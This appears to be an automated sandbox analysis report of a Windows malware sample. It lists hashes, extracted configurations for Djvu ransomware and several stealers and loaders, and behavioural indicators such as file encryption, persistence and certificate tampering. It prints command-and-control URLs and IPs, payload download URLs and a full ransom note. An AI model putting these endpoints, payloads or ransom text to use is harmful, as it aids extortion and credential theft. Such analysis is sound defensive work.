Analysis
-
max time kernel
1200s -
max time network
1219s -
submitted
01-01-1970 00:00
Static task
static1
Behavioral task
behavioral1
Sample
bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe
Resource
win7-en-20210920
Behavioral task
behavioral2
Sample
bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe
Resource
win10-en-20211014
General
-
Target
bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe
-
Size
341KB
-
MD5
bb13f6d819f3b18ebbfe1fb2e0d6c1ed
-
SHA1
7449eecd5006784372a71b1f9f05f74bbe0cd0c7
-
SHA256
bac4bdaaae7da623a7ba01a0ddfe807c285a36afa6dc502429d407ba70fa4a73
-
SHA512
1763e7b5f21ae06af2da655166f46a958f6089e54b649a68cd9540d6623f9e08e51a87b0a856eaadd79824172a8920d997ae1936ca8eee79b85f5f5d7fdf41cd
Malware Config
Extracted
C:\_readme.txt
djvu
manager@mailtemp.ch
supporthelp@airmail.cc
https://we.tl/t-CcXGxzXf71
Extracted
smokeloader
2020
http://xacokuo8.top/
http://hajezey1.top/
http://nusurtal4f.net/
http://netomishnetojuk.net/
http://escalivrouter.net/
http://nick22doom4.net/
http://wrioshtivsio.su/
http://nusotiso4.su/
http://rickkhtovkka.biz/
http://palisotoliso.net/
Extracted
redline
11111
93.115.20.139:28978
Extracted
vidar
41.6
754
https://mas.to/@lilocc
-
profile_id
754
Extracted
raccoon
60e59be328fbd2ebac1839ea99411dccb00a6f49
-
url4cnc
http://telegin.top/agrybirdsgamerept
http://ttmirror.top/agrybirdsgamerept
http://teletele.top/agrybirdsgamerept
http://telegalive.top/agrybirdsgamerept
http://toptelete.top/agrybirdsgamerept
http://telegraf.top/agrybirdsgamerept
https://t.me/agrybirdsgamerept
Extracted
raccoon
04256a88c32735dbae9e9e965ae6cfecb37a8ec5
-
url4cnc
http://telegin.top/kaba4ello
http://ttmirror.top/kaba4ello
http://teletele.top/kaba4ello
http://telegalive.top/kaba4ello
http://toptelete.top/kaba4ello
http://telegraf.top/kaba4ello
https://t.me/kaba4ello
Extracted
redline
SafeInstaller
185.183.32.161:80
Extracted
raccoon
b6c3d41f039fbc353edce408d14ca491fee838d3
-
url4cnc
http://telegin.top/hiioBlacklight1
http://ttmirror.top/hiioBlacklight1
http://teletele.top/hiioBlacklight1
http://telegalive.top/hiioBlacklight1
http://toptelete.top/hiioBlacklight1
http://telegraf.top/hiioBlacklight1
https://t.me/hiioBlacklight1
Extracted
djvu
http://rlrz.org/lancer/get.php
-
extension
.rivd
-
offline_id
WbO7bkwHxaepEmevfYYUBNgcxNJGpd7hoNKokRt1
-
payload_url
http://znpst.top/dl/build2.exe
http://rlrz.org/files/1/build3.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-CcXGxzXf71 Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: manager@mailtemp.ch Reserve e-mail address to contact us: supporthelp@airmail.cc Your personal ID: 0342gSd743d
Extracted
redline
z0rm1on
185.215.113.94:15564
Extracted
vidar
41.6
706
https://mas.to/@lilocc
-
profile_id
706
Extracted
redline
MONEY-2021
2.56.214.190:59628
Extracted
vidar
41.5
517
https://mas.to/@xeroxxx
-
profile_id
517
Signatures
-
Bazar Loader
Detected loader normally used to deploy BazarBackdoor malware.
-
Detected Djvu ransomware 6 IoCs
Processes:
resource yara_rule behavioral1/memory/1652-180-0x0000000000424141-mapping.dmp family_djvu behavioral1/memory/1652-179-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/1952-183-0x0000000004510000-0x000000000462B000-memory.dmp family_djvu behavioral1/memory/1652-184-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/2664-251-0x0000000000424141-mapping.dmp family_djvu behavioral1/memory/2664-263-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu -
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 5 IoCs
Processes:
resource yara_rule behavioral1/memory/1296-81-0x0000000000520000-0x000000000053A000-memory.dmp family_redline behavioral1/memory/1736-159-0x0000000000610000-0x000000000062A000-memory.dmp family_redline behavioral1/memory/1824-195-0x0000000000500000-0x000000000051A000-memory.dmp family_redline behavioral1/memory/1604-268-0x0000000002C80000-0x0000000002C9C000-memory.dmp family_redline behavioral1/memory/1604-272-0x0000000004730000-0x000000000474B000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
regsvr32.exedescription pid process target process PID 1752 created 1204 1752 regsvr32.exe Explorer.EXE -
Bazar/Team9 Loader payload 2 IoCs
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\403F.dll BazarLoaderVar5 C:\Users\Admin\AppData\Local\Temp\403F.dll BazarLoaderVar5 -
Vidar Stealer 7 IoCs
Processes:
resource yara_rule behavioral1/memory/1100-101-0x0000000000400000-0x0000000002F6F000-memory.dmp family_vidar behavioral1/memory/1100-100-0x0000000004740000-0x0000000004816000-memory.dmp family_vidar behavioral1/memory/1496-210-0x00000000002E0000-0x00000000003B6000-memory.dmp family_vidar behavioral1/memory/1496-228-0x0000000000400000-0x0000000002C15000-memory.dmp family_vidar behavioral1/memory/2396-288-0x00000000004A18CD-mapping.dmp family_vidar behavioral1/memory/2356-291-0x00000000002F0000-0x00000000003C6000-memory.dmp family_vidar behavioral1/memory/2396-292-0x0000000000400000-0x00000000004D9000-memory.dmp family_vidar -
Downloads MZ/PE file
-
Executes dropped EXE 63 IoCs
Processes:
1555.exe1555.exe2389.exe2C02.exe3843.exe49C2.exe5651.exe6511.exe6BD5.exe7587.exeC4A.exeD83.exeC4A.exe115B.exe13BD.exe16D9.exe1CE3.exeMXb89OH1.EXEWZEvHVXQ.exeC4A.exeC4A.exebuild2.exebuild2.exebuild3.exebuild3.exejjthwrumstsca.exeuethwrumstsca.exeuethwrumstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exejjthwrumstsca.exeuethwrumstsca.exeuethwruC4A.exeC4A.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exepid process 1496 1555.exe 432 1555.exe 1296 2389.exe 1872 2C02.exe 1100 3843.exe 1044 49C2.exe 1416 5651.exe 916 6511.exe 832 6BD5.exe 1736 7587.exe 1952 C4A.exe 1496 D83.exe 1652 C4A.exe 1824 115B.exe 1324 13BD.exe 1604 16D9.exe 1032 1CE3.exe 1488 MXb89OH1.EXE 2120 WZEvHVXQ.exe 2404 C4A.exe 2664 C4A.exe 2356 build2.exe 2396 build2.exe 1196 build3.exe 2052 build3.exe 2892 jjthwru 2848 mstsca.exe 2908 uethwru 2788 mstsca.exe 2780 uethwru 3056 mstsca.exe 3064 mstsca.exe 2336 mstsca.exe 860 mstsca.exe 1688 mstsca.exe 2008 mstsca.exe 2572 mstsca.exe 2956 mstsca.exe 2496 mstsca.exe 2440 mstsca.exe 1740 mstsca.exe 1416 mstsca.exe 2128 mstsca.exe 2632 mstsca.exe 1400 mstsca.exe 2492 mstsca.exe 2712 mstsca.exe 2672 mstsca.exe 2464 jjthwru 2884 mstsca.exe 2888 uethwru 2288 mstsca.exe 1280 uethwru 2628 C4A.exe 1940 C4A.exe 300 mstsca.exe 2296 mstsca.exe 2688 mstsca.exe 1752 mstsca.exe 2392 mstsca.exe 2276 mstsca.exe 2056 mstsca.exe 2328 mstsca.exe -
Modifies extensions of user files 12 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
C4A.exedescription ioc process File renamed C:\Users\Admin\Pictures\CompareImport.raw => C:\Users\Admin\Pictures\CompareImport.raw.rivd C4A.exe File renamed C:\Users\Admin\Pictures\ConvertFromSet.raw => C:\Users\Admin\Pictures\ConvertFromSet.raw.rivd C4A.exe File renamed C:\Users\Admin\Pictures\JoinAdd.raw => C:\Users\Admin\Pictures\JoinAdd.raw.rivd C4A.exe File renamed C:\Users\Admin\Pictures\RevokeFind.crw => C:\Users\Admin\Pictures\RevokeFind.crw.rivd C4A.exe File renamed C:\Users\Admin\Pictures\SearchMove.png => C:\Users\Admin\Pictures\SearchMove.png.rivd C4A.exe File renamed C:\Users\Admin\Pictures\UndoNew.tif => C:\Users\Admin\Pictures\UndoNew.tif.rivd C4A.exe File renamed C:\Users\Admin\Pictures\CheckpointOpen.png => C:\Users\Admin\Pictures\CheckpointOpen.png.rivd C4A.exe File renamed C:\Users\Admin\Pictures\CheckpointResume.crw => C:\Users\Admin\Pictures\CheckpointResume.crw.rivd C4A.exe File renamed C:\Users\Admin\Pictures\ConvertFromPing.crw => C:\Users\Admin\Pictures\ConvertFromPing.crw.rivd C4A.exe File renamed C:\Users\Admin\Pictures\CopyUndo.crw => C:\Users\Admin\Pictures\CopyUndo.crw.rivd C4A.exe File renamed C:\Users\Admin\Pictures\DisableSplit.crw => C:\Users\Admin\Pictures\DisableSplit.crw.rivd C4A.exe File renamed C:\Users\Admin\Pictures\ReadWatch.raw => C:\Users\Admin\Pictures\ReadWatch.raw.rivd C4A.exe -
Tries to connect to .bazar domain 7 IoCs
Attempts to lookup or connect to a .bazar domain, used by BazarBackdoor, Trickbot, and potentially others.
Processes:
flow ioc 188 bluehail.bazar 189 whitestorm9p.bazar 136 reddew28c.bazar 137 bluehail.bazar 138 whitestorm9p.bazar 139 aqsouhyw.bazar 187 reddew28c.bazar -
Deletes itself 1 IoCs
Processes:
Explorer.EXEpid process 1204 Explorer.EXE -
Loads dropped DLL 40 IoCs
Processes:
1555.exe2C02.exeregsvr32.exeWerFault.exeWerFault.exeC4A.execmd.execmd.exeC4A.exeC4A.exemsiexec.exemsiexec.exeWerFault.exeC4A.exeWerFault.exejjthwruregsvr32.exejjthwrupid process 1496 1555.exe 1872 2C02.exe 1752 regsvr32.exe 1336 WerFault.exe 1336 WerFault.exe 1336 WerFault.exe 1336 WerFault.exe 1336 WerFault.exe 1336 WerFault.exe 1336 WerFault.exe 2004 WerFault.exe 2004 WerFault.exe 2004 WerFault.exe 2004 WerFault.exe 1952 C4A.exe 1948 cmd.exe 1820 cmd.exe 1652 C4A.exe 1652 C4A.exe 2404 C4A.exe 2972 msiexec.exe 2920 msiexec.exe 2092 WerFault.exe 2092 WerFault.exe 2092 WerFault.exe 2092 WerFault.exe 2664 C4A.exe 2664 C4A.exe 2664 C4A.exe 2664 C4A.exe 2584 WerFault.exe 2584 WerFault.exe 2584 WerFault.exe 2584 WerFault.exe 2584 WerFault.exe 2584 WerFault.exe 2584 WerFault.exe 2892 jjthwru 1684 regsvr32.exe 2464 jjthwru -
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
C4A.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\94083928-3961-499c-8af9-20acea08c6f8\\C4A.exe\" --AutoStart" C4A.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 92 api.2ip.ua 107 api.2ip.ua 180 api.2ip.ua 91 api.2ip.ua -
Suspicious use of SetThreadContext 25 IoCs
Processes:
bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe1555.exeC4A.exeC4A.exebuild2.exebuild3.exemstsca.exeuethwrumstsca.exemstsca.exeregsvr32.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exeuethwruC4A.exemstsca.exemstsca.exemstsca.exemstsca.exedescription pid process target process PID 320 set thread context of 1048 320 bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe PID 1496 set thread context of 432 1496 1555.exe 1555.exe PID 1952 set thread context of 1652 1952 C4A.exe C4A.exe PID 2404 set thread context of 2664 2404 C4A.exe C4A.exe PID 2356 set thread context of 2396 2356 build2.exe build2.exe PID 1196 set thread context of 2052 1196 build3.exe build3.exe PID 2848 set thread context of 2788 2848 mstsca.exe mstsca.exe PID 2908 set thread context of 2780 2908 uethwru uethwru PID 3056 set thread context of 3064 3056 mstsca.exe mstsca.exe PID 2336 set thread context of 860 2336 mstsca.exe mstsca.exe PID 1752 set thread context of 1052 1752 regsvr32.exe chrome.exe PID 1688 set thread context of 2008 1688 mstsca.exe mstsca.exe PID 2572 set thread context of 2956 2572 mstsca.exe mstsca.exe PID 2496 set thread context of 2440 2496 mstsca.exe mstsca.exe PID 1740 set thread context of 1416 1740 mstsca.exe mstsca.exe PID 2128 set thread context of 2632 2128 mstsca.exe mstsca.exe PID 1400 set thread context of 2492 1400 mstsca.exe mstsca.exe PID 2712 set thread context of 2672 2712 mstsca.exe mstsca.exe PID 2884 set thread context of 2288 2884 mstsca.exe mstsca.exe PID 2888 set thread context of 1280 2888 uethwru uethwru PID 2628 set thread context of 1940 2628 C4A.exe C4A.exe PID 300 set thread context of 2296 300 mstsca.exe mstsca.exe PID 2688 set thread context of 1752 2688 mstsca.exe mstsca.exe PID 2392 set thread context of 2276 2392 mstsca.exe mstsca.exe PID 2056 set thread context of 2328 2056 mstsca.exe mstsca.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 4 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 1336 1100 WerFault.exe 3843.exe 2004 1044 WerFault.exe 49C2.exe 2092 1496 WerFault.exe D83.exe 2584 2396 WerFault.exe build2.exe -
Checks SCSI registry key(s) 3 TTPs 21 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
uethwrujjthwrujjthwruuethwrubb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe1555.exe2C02.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI uethwru Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI uethwru Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jjthwru Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jjthwru Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI uethwru Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1555.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 2C02.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI uethwru Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1555.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI uethwru Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jjthwru Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jjthwru Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jjthwru Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI uethwru Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1555.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 2C02.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 2C02.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jjthwru -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 2428 schtasks.exe 2660 schtasks.exe -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 2020 taskkill.exe 2164 taskkill.exe -
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Processes:
C4A.exeC4A.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C4A.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C4A.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C4A.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C4A.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C4A.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exeExplorer.EXEpid process 1048 bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe 1048 bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 5 IoCs
Processes:
Explorer.EXEWerFault.exeWerFault.exeWerFault.exeWerFault.exepid process 1204 Explorer.EXE 1336 WerFault.exe 2004 WerFault.exe 2092 WerFault.exe 2584 WerFault.exe -
Suspicious behavior: MapViewOfSection 7 IoCs
Processes:
bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe1555.exe2C02.exeuethwrujjthwrujjthwruuethwrupid process 1048 bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe 432 1555.exe 1872 2C02.exe 2780 uethwru 2892 jjthwru 2464 jjthwru 1280 uethwru -
Suspicious use of AdjustPrivilegeToken 25 IoCs
Processes:
